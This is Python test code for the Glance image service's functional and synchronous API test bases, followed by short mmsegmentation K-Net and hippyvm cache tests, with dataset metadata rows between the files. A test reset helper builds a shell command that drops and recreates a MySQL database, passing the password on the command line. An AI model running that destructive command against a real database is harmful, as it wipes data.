# We leave behind the sqlite DB for failing tests to aid
# in diagnosis, as the file size is relatively small and
# won't interfere with subsequent tests as it's in a per-
# test directory (which is blown-away if the test is green)
pass
elif conn_string.startswith('mysql'):
# We can execute the MySQL client to destroy and re-create
# the MYSQL database, which is easier and less error-prone
# than using SQLAlchemy to do this via MetaData...trust me.
database = conn_pieces.path.strip('/')
loc_pieces = conn_pieces.netloc.split('@')
host = loc_pieces[1]
auth_pieces = loc_pieces[0].split(':')
user = auth_pieces[0]
password = ""
if len(auth_pieces) > 1:
if auth_pieces[1].strip():
password = "-p%s" % auth_pieces[1]
sql = ("drop database if exists %(database)s; "
"create database %(database)s;") % {'database': database}
cmd = ("mysql -u%(user)s %(password)s -h%(host)s "
"-e\"%(sql)s\"") % {'user': user, 'password': password,
'host': host, 'sql': sql}
exitcode, out, err = execute(cmd)
self.assertEqual(0, exitcode)
def cleanup(self):
"""
Makes sure anything we created or started up in the
tests are destroyed or spun down
"""
# NOTE(jbresnah) call stop on each of the servers instead of
# checking the pid file. stop() will wait until the child
# server is dead. This eliminates the possibility of a race
# between a child process listening on a port actually dying
# and a new process being started
servers = [self.api_server,
self.scrubber_daemon]
for s in servers:
try:
s.stop()
except Exception:
pass
for f in self.files_to_destroy:
if os.path.exists(f):
os.unlink(f)
def start_server(self,
server,
expect_launch,
expect_exit=True,
expected_exitcode=0,
**kwargs):
"""
Starts a server on an unused port.
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the server.
:param server: the server to launch
:param expect_launch: true iff the server is expected to
successfully start
:param expect_exit: true iff the launched process is expected
to exit in a timely fashion
:param expected_exitcode: expected exitcode from the launcher
"""
self.cleanup()
# Start up the requested server
exitcode, out, err = server.start(expect_exit=expect_exit,
expected_exitcode=expected_exitcode,
**kwargs)
if expect_exit:
self.assertEqual(expected_exitcode, exitcode,
"Failed to spin up the requested server. "
"Got: %s" % err)
self.launched_servers.append(server)
launch_msg = self.wait_for_servers([server], expect_launch)
        self.assertIsNone(launch_msg, launch_msg)
def start_with_retry(self, server, port_name, max_retries,
expect_launch=True,
**kwargs):
"""
Starts a server, with retries if the server launches but
fails to start listening on the expected port.
:param server: the server to launch
:param port_name: the name of the port attribute
:param max_retries: the maximum number of attempts
:param expect_launch: true iff the server is expected to
successfully start
:param expect_exit: true iff the launched process is expected
to exit in a timely fashion
"""
launch_msg = None
for i in range(max_retries):
exitcode, out, err = server.start(expect_exit=not expect_launch,
**kwargs)
name = server.server_name
self.assertEqual(0, exitcode,
"Failed to spin up the %s server. "
"Got: %s" % (name, err))
launch_msg = self.wait_for_servers([server], expect_launch)
if launch_msg:
server.stop()
server.bind_port = get_unused_port()
setattr(self, port_name, server.bind_port)
else:
self.launched_servers.append(server)
break
        self.assertIsNone(launch_msg, launch_msg)
def start_servers(self, **kwargs):
"""
        Starts the API and Registry servers (glance-control api start)
        on unused ports. glance-control should be installed into the
        python path.
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the servers.
"""
self.cleanup()
# Start up the API server
self.start_with_retry(self.api_server, 'api_port', 3, **kwargs)
if self.include_scrubber:
exitcode, out, err = self.scrubber_daemon.start(**kwargs)
self.assertEqual(0, exitcode,
"Failed to spin up the Scrubber daemon. "
"Got: %s" % err)
def ping_server(self, port):
"""
Simple ping on the port. If responsive, return True, else
return False.
:note We use raw sockets, not ping here, since ping uses ICMP and
has no concept of ports...
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(("127.0.0.1", port))
return True
except socket.error:
return False
finally:
s.close()
def ping_server_ipv6(self, port):
"""
Simple ping on the port. If responsive, return True, else
return False.
:note We use raw sockets, not ping here, since ping uses ICMP and
has no concept of ports...
The function uses IPv6 (therefore AF_INET6 and ::1).
"""
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
try:
s.connect(("::1", port))
return True
except socket.error:
return False
finally:
s.close()
def wait_for_servers(self, servers, expect_launch=True, timeout=30):
"""
Tight loop, waiting for the given server port(s) to be available.
Returns when all are pingable. There is a timeout on waiting
for the servers to come up.
:param servers: Glance server ports to ping
:param expect_launch: Optional, true iff the server(s) are
expected to successfully start
:param timeout: Optional, defaults to 30 seconds
:returns: None if launch expectation is met, otherwise an
assertion message
"""
now = datetime.datetime.now()
timeout_time = now + datetime.timedelta(seconds=timeout)
replied = []
while (timeout_time > now):
pinged = 0
for server in servers:
if self.ping_server(server.bind_port):
pinged += 1
if server not in replied:
replied.append(server)
if pinged == len(servers):
msg = 'Unexpected server launch status'
return None if expect_launch else msg
now = datetime.datetime.now()
time.sleep(0.05)
failed = list(set(servers) - set(replied))
msg = 'Unexpected server launch status for: '
for f in failed:
msg += ('%s, ' % f.server_name)
if os.path.exists(f.pid_file):
pid = f.process_pid
trace = f.pid_file.replace('.pid', '.trace')
if self.tracecmd:
cmd = '%s -p %d -o %s' % (self.tracecmd, pid, trace)
try:
execute(cmd, raise_error=False, expect_exit=False)
except OSError as e:
if e.errno == errno.ENOENT:
raise RuntimeError('No executable found for "%s" '
'command.' % self.tracecmd)
else:
raise
time.sleep(0.5)
if os.path.exists(trace):
msg += ('\n%s:\n%s\n' % (self.tracecmd,
open(trace).read()))
self.add_log_details(failed)
return msg if expect_launch else None
def stop_server(self, server):
"""
Called to stop a single server in a normal fashion using the
glance-control stop method to gracefully shut the server down.
:param server: the server to stop
"""
# Spin down the requested server
server.stop()
def stop_servers(self):
"""
Called to stop the started servers in a normal fashion. Note
that cleanup() will stop the servers using a fairly draconian
method of sending a SIGTERM signal to the servers. Here, we use
the glance-control stop method to gracefully shut the server down.
This method also asserts that the shutdown was clean, and so it
is meant to be called during a normal test case sequence.
"""
# Spin down the API server
self.stop_server(self.api_server)
if self.include_scrubber:
self.stop_server(self.scrubber_daemon)
def run_sql_cmd(self, sql):
"""
Provides a crude mechanism to run manual SQL commands for backend
DB verification within the functional tests.
The raw result set is returned.
"""
engine = db_api.get_engine()
return engine.execute(sql)
def copy_data_file(self, file_name, dst_dir):
src_file_name = os.path.join('glance/tests/etc', file_name)
shutil.copy(src_file_name, dst_dir)
dst_file_name = os.path.join(dst_dir, file_name)
return dst_file_name
def add_log_details_on_exception(self, *args, **kwargs):
self.add_log_details()
def add_log_details(self, servers=None):
for s in servers or self.launched_servers:
if s.log_file not in self._attached_server_logs:
self._attached_server_logs.append(s.log_file)
self.addDetail(
s.server_name, testtools.content.text_content(s.dump_log()))
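# Illustrative sketch (an assumption, not part of the original suite): a
# minimal test case built on FunctionalTest, showing the intended
# start_servers()/stop_servers() lifecycle around real server processes.
class _ExampleFunctionalUsage(FunctionalTest):
    def test_api_round_trip(self):
        # Spins up the API server (and scrubber daemon) with default config.
        self.start_servers()
        # The API port was allocated in setUp() and should now respond.
        self.assertTrue(self.ping_server(self.api_port))
        # Gracefully stop everything and assert a clean shutdown.
        self.stop_servers()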
class MultipleBackendFunctionalTest(test_utils.BaseTestCase):
"""
Base test class for any test that wants to test the actual
servers and clients and not just the stubbed out interfaces
"""
inited = False
disabled = False
launched_servers = []
def setUp(self):
super(MultipleBackendFunctionalTest, self).setUp()
self.test_dir = self.useFixture(fixtures.TempDir()).path
self.api_protocol = 'http'
self.api_port, api_sock = test_utils.get_unused_port_and_socket()
# NOTE: Scrubber is enabled by default for the functional tests.
        # Please disable it by explicitly setting 'self.include_scrubber' to
# False in the test SetUps that do not require Scrubber to run.
self.include_scrubber = True
self.tracecmd = tracecmd_osmap.get(platform.system())
conf_dir = os.path.join(self.test_dir, 'etc')
utils.safe_mkdirs(conf_dir)
self.copy_data_file('schema-image.json', conf_dir)
self.copy_data_file('policy.json', conf_dir)
self.copy_data_file('property-protections.conf', conf_dir)
self.copy_data_file('property-protections-policies.conf', conf_dir)
self.property_file_roles = os.path.join(conf_dir,
'property-protections.conf')
property_policies = 'property-protections-policies.conf'
self.property_file_policies = os.path.join(conf_dir,
property_policies)
self.policy_file = os.path.join(conf_dir, 'policy.json')
self.api_server_multiple_backend = ApiServerForMultipleBackend(
self.test_dir, self.api_port, self.policy_file, sock=api_sock)
self.scrubber_daemon = ScrubberDaemon(self.test_dir, self.policy_file)
self.pid_files = [self.api_server_multiple_backend.pid_file,
self.scrubber_daemon.pid_file]
self.files_to_destroy = []
self.launched_servers = []
# Keep track of servers we've logged so we don't double-log them.
self._attached_server_logs = []
self.addOnException(self.add_log_details_on_exception)
if not self.disabled:
# We destroy the test data store between each test case,
# and recreate it, which ensures that we have no side-effects
# from the tests
self.addCleanup(
self._reset_database,
self.api_server_multiple_backend.sql_connection)
self.addCleanup(self.cleanup)
self._reset_database(
self.api_server_multiple_backend.sql_connection)
def set_policy_rules(self, rules):
fap = open(self.policy_file, 'w')
fap.write(jsonutils.dumps(rules))
fap.close()
def _reset_database(self, conn_string):
conn_pieces = urlparse.urlparse(conn_string)
if conn_string.startswith('sqlite'):
# We leave behind the sqlite DB for failing tests to aid
# in diagnosis, as the file size is relatively small and
# won't interfere with subsequent tests as it's in a per-
# test directory (which is blown-away if the test is green)
pass
elif conn_string.startswith('mysql'):
# We can execute the MySQL client to destroy and re-create
# the MYSQL database, which is easier and less error-prone
# than using SQLAlchemy to do this via MetaData...trust me.
database = conn_pieces.path.strip('/')
loc_pieces = conn_pieces.netloc.split('@')
host = loc_pieces[1]
auth_pieces = loc_pieces[0].split(':')
user = auth_pieces[0]
password = ""
if len(auth_pieces) > 1:
if auth_pieces[1].strip():
password = "-p%s" % auth_pieces[1]
sql = ("drop database if exists %(database)s; "
"create database %(database)s;") % {'database': database}
cmd = ("mysql -u%(user)s %(password)s -h%(host)s "
"-e\"%(sql)s\"") % {'user': user, 'password': password,
'host': host, 'sql': sql}
exitcode, out, err = execute(cmd)
self.assertEqual(0, exitcode)
def cleanup(self):
"""
Makes sure anything we created or started up in the
tests are destroyed or spun down
"""
# NOTE(jbresnah) call stop on each of the servers instead of
# checking the pid file. stop() will wait until the child
# server is dead. This eliminates the possibility of a race
# between a child process listening on a port actually dying
# and a new process being started
servers = [self.api_server_multiple_backend,
self.scrubber_daemon]
for s in servers:
try:
s.stop()
except Exception:
pass
for f in self.files_to_destroy:
if os.path.exists(f):
os.unlink(f)
def start_server(self,
server,
expect_launch,
expect_exit=True,
expected_exitcode=0,
**kwargs):
"""
Starts a server on an unused port.
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the server.
:param server: the server to launch
:param expect_launch: true iff the server is expected to
successfully start
:param expect_exit: true iff the launched process is expected
to exit in a timely fashion
:param expected_exitcode: expected exitcode from the launcher
"""
self.cleanup()
# Start up the requested server
exitcode, out, err = server.start(expect_exit=expect_exit,
expected_exitcode=expected_exitcode,
**kwargs)
if expect_exit:
self.assertEqual(expected_exitcode, exitcode,
"Failed to spin up the requested server. "
"Got: %s" % err)
self.launched_servers.append(server)
launch_msg = self.wait_for_servers([server], expect_launch)
        self.assertIsNone(launch_msg, launch_msg)
def start_with_retry(self, server, port_name, max_retries,
expect_launch=True,
**kwargs):
"""
Starts a server, with retries if the server launches but
fails to start listening on the expected port.
:param server: the server to launch
:param port_name: the name of the port attribute
:param max_retries: the maximum number of attempts
:param expect_launch: true iff the server is expected to
successfully start
:param expect_exit: true iff the launched process is expected
to exit in a timely fashion
"""
launch_msg = None
for i in range(max_retries):
exitcode, out, err = server.start(expect_exit=not expect_launch,
**kwargs)
name = server.server_name
self.assertEqual(0, exitcode,
"Failed to spin up the %s server. "
"Got: %s" % (name, err))
launch_msg = self.wait_for_servers([server], expect_launch)
if launch_msg:
server.stop()
server.bind_port = get_unused_port()
setattr(self, port_name, server.bind_port)
else:
self.launched_servers.append(server)
break
        self.assertIsNone(launch_msg, launch_msg)
def start_servers(self, **kwargs):
"""
        Starts the API and Registry servers (glance-control api start)
        on unused ports. glance-control should be installed into the
        python path.
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the servers.
"""
self.cleanup()
# Start up the API server
self.start_with_retry(self.api_server_multiple_backend,
'api_port', 3, **kwargs)
if self.include_scrubber:
exitcode, out, err = self.scrubber_daemon.start(**kwargs)
self.assertEqual(0, exitcode,
"Failed to spin up the Scrubber daemon. "
"Got: %s" % err)
def ping_server(self, port):
"""
Simple ping on the port. If responsive, return True, else
return False.
:note We use raw sockets, not ping here, since ping uses ICMP and
has no concept of ports...
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(("127.0.0.1", port))
return True
except socket.error:
return False
finally:
s.close()
def ping_server_ipv6(self, port):
"""
Simple ping on the port. If responsive, return True, else
return False.
:note We use raw sockets, not ping here, since ping uses ICMP and
has no concept of ports...
The function uses IPv6 (therefore AF_INET6 and ::1).
"""
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
try:
s.connect(("::1", port))
return True
except socket.error:
return False
finally:
s.close()
def wait_for_servers(self, servers, expect_launch=True, timeout=30):
"""
Tight loop, waiting for the given server port(s) to be available.
Returns when all are pingable. There is a timeout on waiting
for the servers to come up.
:param servers: Glance server ports to ping
:param expect_launch: Optional, true iff the server(s) are
expected to successfully start
:param timeout: Optional, defaults to 30 seconds
:returns: None if launch expectation is met, otherwise an
assertion message
"""
now = datetime.datetime.now()
timeout_time = now + datetime.timedelta(seconds=timeout)
replied = []
while (timeout_time > now):
pinged = 0
for server in servers:
if self.ping_server(server.bind_port):
pinged += 1
if server not in replied:
replied.append(server)
if pinged == len(servers):
msg = 'Unexpected server launch status'
return None if expect_launch else msg
now = datetime.datetime.now()
time.sleep(0.05)
failed = list(set(servers) - set(replied))
msg = 'Unexpected server launch status for: '
for f in failed:
msg += ('%s, ' % f.server_name)
if os.path.exists(f.pid_file):
pid = f.process_pid
trace = f.pid_file.replace('.pid', '.trace')
if self.tracecmd:
cmd = '%s -p %d -o %s' % (self.tracecmd, pid, trace)
try:
execute(cmd, raise_error=False, expect_exit=False)
except OSError as e:
if e.errno == errno.ENOENT:
raise RuntimeError('No executable found for "%s" '
'command.' % self.tracecmd)
else:
raise
time.sleep(0.5)
if os.path.exists(trace):
msg += ('\n%s:\n%s\n' % (self.tracecmd,
open(trace).read()))
self.add_log_details(failed)
return msg if expect_launch else None
def stop_server(self, server):
"""
Called to stop a single server in a normal fashion using the
glance-control stop method to gracefully shut the server down.
:param server: the server to stop
"""
# Spin down the requested server
server.stop()
def stop_servers(self):
"""
Called to stop the started servers in a normal fashion. Note
that cleanup() will stop the servers using a fairly draconian
method of sending a SIGTERM signal to the servers. Here, we use
the glance-control stop method to gracefully shut the server down.
This method also asserts that the shutdown was clean, and so it
is meant to be called during a normal test case sequence.
"""
# Spin down the API
self.stop_server(self.api_server_multiple_backend)
if self.include_scrubber:
self.stop_server(self.scrubber_daemon)
def run_sql_cmd(self, sql):
"""
Provides a crude mechanism to run manual SQL commands for backend
DB verification within the functional tests.
The raw result set is returned.
"""
engine = db_api.get_engine()
return engine.execute(sql)
def copy_data_file(self, file_name, dst_dir):
src_file_name = os.path.join('glance/tests/etc', file_name)
shutil.copy(src_file_name, dst_dir)
dst_file_name = os.path.join(dst_dir, file_name)
return dst_file_name
def add_log_details_on_exception(self, *args, **kwargs):
self.add_log_details()
def add_log_details(self, servers=None):
for s in servers or self.launched_servers:
if s.log_file not in self._attached_server_logs:
self._attached_server_logs.append(s.log_file)
self.addDetail(
s.server_name, testtools.content.text_content(s.dump_log()))
class SynchronousAPIBase(test_utils.BaseTestCase):
"""A base class that provides synchronous calling into the API.
This provides a way to directly call into the API WSGI stack
without starting a separate server, and with a simple paste
pipeline. Configured with multi-store and a real database.
This differs from the FunctionalTest lineage above in that they
start a full copy of the API server as a separate process, whereas
this calls directly into the WSGI stack. This test base is
appropriate for situations where you need to be able to mock the
state of the world (i.e. warp time, or inject errors) but should
not be used for happy-path testing where FunctionalTest provides
more isolation.
To use this, inherit and run start_server() before you are ready
to make API calls (either in your setUp() or per-test if you need
to change config or mocking).
Once started, use the api_get(), api_put(), api_post(), and
api_delete() methods to make calls to the API.
"""
TENANT = str(uuid.uuid4())
@mock.patch('oslo_db.sqlalchemy.enginefacade.writer.get_engine')
def setup_database(self, mock_get_engine):
"""Configure and prepare a fresh sqlite database."""
db_file = 'sqlite:///%s/test.db' % self.test_dir
self.config(connection=db_file, group='database')
# NOTE(danms): Make sure that we clear the current global
# database configuration, provision a temporary database file,
# and run migrations with our configuration to define the
# schema there.
db_api.clear_db_env()
engine = db_api.get_engine()
mock_get_engine.return_value = engine
with mock.patch('logging.config'):
# NOTE(danms): The alembic config in the env module will break our
# BaseTestCase logging setup. So mock that out to prevent it while
# we db_sync.
test_utils.db_sync(engine=engine)
def setup_simple_paste(self):
"""Setup a very simple no-auth paste pipeline.
This configures the API to be very direct, including only the
middleware absolutely required for consistent API calls.
"""
self.paste_config = os.path.join(self.test_dir, 'glance-api-paste.ini')
with open(self.paste_config, 'w') as f:
f.write(textwrap.dedent("""
[filter:context]
paste.filter_factory = glance.api.middleware.context:\
ContextMiddleware.factory
[filter:fakeauth]
paste.filter_factory = glance.tests.utils:\
FakeAuthMiddleware.factory
[pipeline:glance-api]
pipeline = context rootapp
[composite:rootapp]
paste.composite_factory = glance.api:root_app_factory
/v2: apiv2app
[app:apiv2app]
paste.app_factory = glance.api.v2.router:API.factory
"""))
def _store_dir(self, store):
return os.path.join(self.test_dir, store)
def setup_stores(self):
"""Configures multiple backend stores.
This configures the API with three file-backed stores (store1,
store2, and store3) as well as a os_glance_staging_store for
imports.
"""
self.config(enabled_backends={'store1': 'file', 'store2': 'file',
'store3': 'file'})
glance_store.register_store_opts(CONF,
reserved_stores=wsgi.RESERVED_STORES)
self.config(default_backend='store1',
group='glance_store')
self.config(filesystem_store_datadir=self._store_dir('store1'),
group='store1')
self.config(filesystem_store_datadir=self._store_dir('store2'),
group='store2')
self.config(filesystem_store_datadir=self._store_dir('store3'),
group='store3')
self.config(filesystem_store_datadir=self._store_dir('staging'),
group='os_glance_staging_store')
glance_store.create_multi_stores(CONF,
reserved_stores=wsgi.RESERVED_STORES)
glance_store.verify_store()
def setUp(self):
super(SynchronousAPIBase, self).setUp()
self.setup_database()
self.setup_simple_paste()
self.setup_stores()
def start_server(self):
"""Builds and "starts" the API server.
        Note that this doesn't actually "start" a separate process the
        way FunctionalTest does above; the terminology is kept so usage
        follows the same pattern.
"""
config.set_config_defaults()
self.api = config.load_paste_app('glance-api',
conf_file=self.paste_config)
def _headers(self, custom_headers=None):
base_headers = {
'X-Identity-Status': 'Confirmed',
'X-Auth-Token': '932c5c84-02ac-4fe5-a9ba-620af0e2bb96',
'X-User-Id': 'f9a41d13-0c13-47e9-bee2-ce4e8bfe958e',
'X-Tenant-Id': self.TENANT,
'Content-Type': 'application/json',
'X-Roles': 'admin',
}
base_headers.update(custom_headers or {})
return base_headers
def api_request(self, method, url, headers=None, data=None,
json=None, body_file=None):
"""Perform a request against the API.
NOTE: Most code should use api_get(), api_post(), api_put(),
or api_delete() instead!
:param method: The HTTP method to use (i.e. GET, POST, etc)
:param url: The *path* part of the URL to call (i.e. /v2/images)
:param headers: Optional updates to the default set of headers
:param data: Optional bytes data payload to send (overrides @json)
:param json: Optional dict structure to be jsonified and sent as
the payload (mutually exclusive with @data)
:param body_file: Optional io.IOBase to provide as the input data
stream for the request (overrides @data)
:returns: A webob.Response object
"""
headers = self._headers(headers)
req = webob.Request.blank(url, method=method,
headers=headers)
if json and not data:
data = jsonutils.dumps(json).encode()
if data and not body_file:
req.body = data
elif body_file:
req.body_file = body_file
return self.api(req)
def api_get(self, url, headers=None):
"""Perform a GET request against the API.
:param url: The *path* part of the URL to call (i.e. /v2/images)
:param headers: Optional updates to the default set of headers
:returns: A webob.Response object
"""
return self.api_request('GET', url, headers=headers)
def api_post(self, url, headers=None, data=None, json=None,
body_file=None):
"""Perform a POST request against the API.
:param url: The *path* part of the URL to call (i.e. /v2/images)
:param headers: Optional updates to the default set of headers
:param data: Optional bytes data payload to send (overrides @json)
:param json: Optional dict structure to be jsonified and sent as
the payload (mutually exclusive with @data)
:param body_file: Optional io.IOBase to provide as the input data
stream for the request (overrides @data)
:returns: A webob.Response object
"""
return self.api_request('POST', url, headers=headers,
data=data, json=json,
body_file=body_file)
def api_put(self, url, headers=None, data=None, json=None, body_file=None):
"""Perform a PUT request against the API.
:param url: The *path* part of the URL to call (i.e. /v2/images)
:param headers: Optional updates to the default set of headers
:param data: Optional bytes data payload to send (overrides @json,
mutually exclusive with body_file)
:param json: Optional dict structure to be jsonified and sent as
the payload (mutually exclusive with @data)
:param body_file: Optional io.IOBase to provide as the input data
stream for the request (overrides @data)
:returns: A webob.Response object
"""
return self.api_request('PUT', url, headers=headers,
data=data, json=json,
body_file=body_file)
def api_delete(self, url, headers=None):
"""Perform a DELETE request against the API.
:param url: The *path* part of the URL to call (i.e. /v2/images)
:param headers: Optional updates to the default set of headers
:returns: A webob.Response object
"""
        return self.api_request('DELETE', url, headers=headers)
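# Illustrative sketch (an assumption, not part of the original module): a
# hypothetical subclass following the calling pattern described in the
# SynchronousAPIBase docstring -- start_server() first, then the api_*()
# helpers, which return webob.Response objects.
class _ExampleSynchronousUsage(SynchronousAPIBase):
    def setUp(self):
        super(_ExampleSynchronousUsage, self).setUp()
        self.start_server()

    def test_list_images(self):
        # Calls straight into the WSGI stack; no separate process involved.
        resp = self.api_get('/v2/images')
        self.assertEqual(200, resp.status_code)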
| 37.536773 | 79 | 0.619053 | 7,817 | 63,287 | 4.82909 | 0.106691 | 0.008345 | 0.011656 | 0.007417 | 0.75557 | 0.746642 | 0.726827 | 0.717158 | 0.70439 | 0.700866 | 0 | 0.007671 | 0.297628 | 63,287 | 1,685 | 80 | 37.55905 | 0.841556 | 0.237426 | 0 | 0.706767 | 0 | 0 | 0.237082 | 0.103475 | 0 | 0 | 0 | 0 | 0.011278 | 1 | 0.058271 | false | 0.016917 | 0.032895 | 0.00094 | 0.138158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6845a6d3fbaef07810fdf01930da0d08838863c | 6,292 | py | Python | tests/test_models/test_heads/test_knet_head.py | rehohoho/mmsegmentation | a73ae7a421e07741fda62c9d81b335cbc4b7f7d6 | [
"Apache-2.0"
] | 1 | 2022-03-07T19:46:03.000Z | 2022-03-07T19:46:03.000Z | tests/test_models/test_heads/test_knet_head.py | rehohoho/mmsegmentation | a73ae7a421e07741fda62c9d81b335cbc4b7f7d6 | [
"Apache-2.0"
] | 2 | 2022-02-25T03:07:23.000Z | 2022-03-08T12:54:05.000Z | tests/test_models/test_heads/test_knet_head.py | rehohoho/mmsegmentation | a73ae7a421e07741fda62c9d81b335cbc4b7f7d6 | [
"Apache-2.0"
] | 1 | 2022-01-04T01:16:12.000Z | 2022-01-04T01:16:12.000Z | # Copyright (c) OpenMMLab. All rights reserved.
import torch
from mmseg.models.decode_heads.knet_head import (IterativeDecodeHead,
KernelUpdateHead)
from .utils import to_cuda
num_stages = 3
conv_kernel_size = 1
kernel_updator_cfg = dict(
type='KernelUpdator',
in_channels=16,
feat_channels=16,
out_channels=16,
gate_norm_act=True,
activate_out=True,
act_cfg=dict(type='ReLU', inplace=True),
norm_cfg=dict(type='LN'))
def test_knet_head():
# test init function of kernel update head
kernel_update_head = KernelUpdateHead(
num_classes=150,
num_ffn_fcs=2,
num_heads=8,
num_mask_fcs=1,
feedforward_channels=128,
in_channels=32,
out_channels=32,
dropout=0.0,
conv_kernel_size=conv_kernel_size,
ffn_act_cfg=dict(type='ReLU', inplace=True),
with_ffn=True,
feat_transform_cfg=dict(conv_cfg=dict(type='Conv2d'), act_cfg=None),
kernel_init=True,
kernel_updator_cfg=kernel_updator_cfg)
kernel_update_head.init_weights()
head = IterativeDecodeHead(
num_stages=num_stages,
kernel_update_head=[
dict(
type='KernelUpdateHead',
num_classes=150,
num_ffn_fcs=2,
num_heads=8,
num_mask_fcs=1,
feedforward_channels=128,
in_channels=32,
out_channels=32,
dropout=0.0,
conv_kernel_size=conv_kernel_size,
ffn_act_cfg=dict(type='ReLU', inplace=True),
with_ffn=True,
feat_transform_cfg=dict(
conv_cfg=dict(type='Conv2d'), act_cfg=None),
kernel_init=False,
kernel_updator_cfg=kernel_updator_cfg)
for _ in range(num_stages)
],
kernel_generate_head=dict(
type='FCNHead',
in_channels=128,
in_index=3,
channels=32,
num_convs=2,
concat_input=True,
dropout_ratio=0.1,
num_classes=150,
align_corners=False))
head.init_weights()
inputs = [
torch.randn(1, 16, 27, 32),
torch.randn(1, 32, 27, 16),
torch.randn(1, 64, 27, 16),
torch.randn(1, 128, 27, 16)
]
if torch.cuda.is_available():
head, inputs = to_cuda(head, inputs)
outputs = head(inputs)
assert outputs[-1].shape == (1, head.num_classes, 27, 16)
    # test that only the prediction of the last stage
    # is returned during testing
with torch.no_grad():
head.eval()
outputs = head(inputs)
assert outputs.shape == (1, head.num_classes, 27, 16)
# test K-Net without `feat_transform_cfg`
head = IterativeDecodeHead(
num_stages=num_stages,
kernel_update_head=[
dict(
type='KernelUpdateHead',
num_classes=150,
num_ffn_fcs=2,
num_heads=8,
num_mask_fcs=1,
feedforward_channels=128,
in_channels=32,
out_channels=32,
dropout=0.0,
conv_kernel_size=conv_kernel_size,
ffn_act_cfg=dict(type='ReLU', inplace=True),
with_ffn=True,
feat_transform_cfg=None,
kernel_updator_cfg=kernel_updator_cfg)
for _ in range(num_stages)
],
kernel_generate_head=dict(
type='FCNHead',
in_channels=128,
in_index=3,
channels=32,
num_convs=2,
concat_input=True,
dropout_ratio=0.1,
num_classes=150,
align_corners=False))
head.init_weights()
inputs = [
torch.randn(1, 16, 27, 32),
torch.randn(1, 32, 27, 16),
torch.randn(1, 64, 27, 16),
torch.randn(1, 128, 27, 16)
]
if torch.cuda.is_available():
head, inputs = to_cuda(head, inputs)
outputs = head(inputs)
assert outputs[-1].shape == (1, head.num_classes, 27, 16)
# test K-Net with
# self.mask_transform_stride == 2 and self.feat_gather_stride == 1
head = IterativeDecodeHead(
num_stages=num_stages,
kernel_update_head=[
dict(
type='KernelUpdateHead',
num_classes=150,
num_ffn_fcs=2,
num_heads=8,
num_mask_fcs=1,
feedforward_channels=128,
in_channels=32,
out_channels=32,
dropout=0.0,
conv_kernel_size=conv_kernel_size,
ffn_act_cfg=dict(type='ReLU', inplace=True),
with_ffn=True,
feat_transform_cfg=dict(
conv_cfg=dict(type='Conv2d'), act_cfg=None),
kernel_init=False,
mask_transform_stride=2,
feat_gather_stride=1,
kernel_updator_cfg=kernel_updator_cfg)
for _ in range(num_stages)
],
kernel_generate_head=dict(
type='FCNHead',
in_channels=128,
in_index=3,
channels=32,
num_convs=2,
concat_input=True,
dropout_ratio=0.1,
num_classes=150,
align_corners=False))
head.init_weights()
inputs = [
torch.randn(1, 16, 27, 32),
torch.randn(1, 32, 27, 16),
torch.randn(1, 64, 27, 16),
torch.randn(1, 128, 27, 16)
]
if torch.cuda.is_available():
head, inputs = to_cuda(head, inputs)
outputs = head(inputs)
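    # With mask_transform_stride=2 the odd input height is floored by the
    # stride-2 downsampling (27 -> 13) and doubled back by the upsampling
    # (13 -> 26), hence 26 rather than 27 below.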
assert outputs[-1].shape == (1, head.num_classes, 26, 16)
# test loss function in K-Net
fake_label = torch.ones_like(
outputs[-1][:, 0:1, :, :], dtype=torch.int16).long()
loss = head.losses(seg_logit=outputs, seg_label=fake_label)
assert loss['loss_ce.s0'] != torch.zeros_like(loss['loss_ce.s0'])
assert loss['loss_ce.s1'] != torch.zeros_like(loss['loss_ce.s1'])
assert loss['loss_ce.s2'] != torch.zeros_like(loss['loss_ce.s2'])
assert loss['loss_ce.s3'] != torch.zeros_like(loss['loss_ce.s3'])
| 32.102041 | 76 | 0.555467 | 763 | 6,292 | 4.310616 | 0.166448 | 0.038918 | 0.040134 | 0.02554 | 0.761022 | 0.7519 | 0.712983 | 0.704165 | 0.704165 | 0.704165 | 0 | 0.056494 | 0.341704 | 6,292 | 195 | 77 | 32.266667 | 0.737566 | 0.048951 | 0 | 0.784884 | 0 | 0 | 0.033808 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 1 | 0.005814 | false | 0 | 0.017442 | 0 | 0.023256 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc0a0d7c7ab8132cf7e51cd34672d1d708f3d4d7 | 2,719 | py | Python | testing/test_immut_cache.py | jweinraub/hippyvm | 09c7643aaa1c4ade566e8681abd2543f12bf874c | [
"MIT"
] | 289 | 2015-01-01T15:36:55.000Z | 2022-03-27T00:22:27.000Z | testing/test_immut_cache.py | jweinraub/hippyvm | 09c7643aaa1c4ade566e8681abd2543f12bf874c | [
"MIT"
] | 26 | 2015-01-21T16:34:41.000Z | 2020-08-26T15:12:54.000Z | testing/test_immut_cache.py | jweinraub/hippyvm | 09c7643aaa1c4ade566e8681abd2543f12bf874c | [
"MIT"
] | 35 | 2015-01-05T12:09:41.000Z | 2022-03-16T09:30:16.000Z | from testing.test_interpreter import BaseTestInterpreter
import uuid
class TestFunctionCache(BaseTestInterpreter):
def test_declare_function_call(self):
output = self.run('''
function myf2197123($a, $b) { return $a + $b; }
echo myf2197123(10, 20);
''')
assert self.space.int_w(output[0]) == 30
cell = self.space.global_function_cache.get_cell('myf2197123', object())
assert cell.constant_value_is_currently_declared
assert cell.constant_value is cell.currently_declared
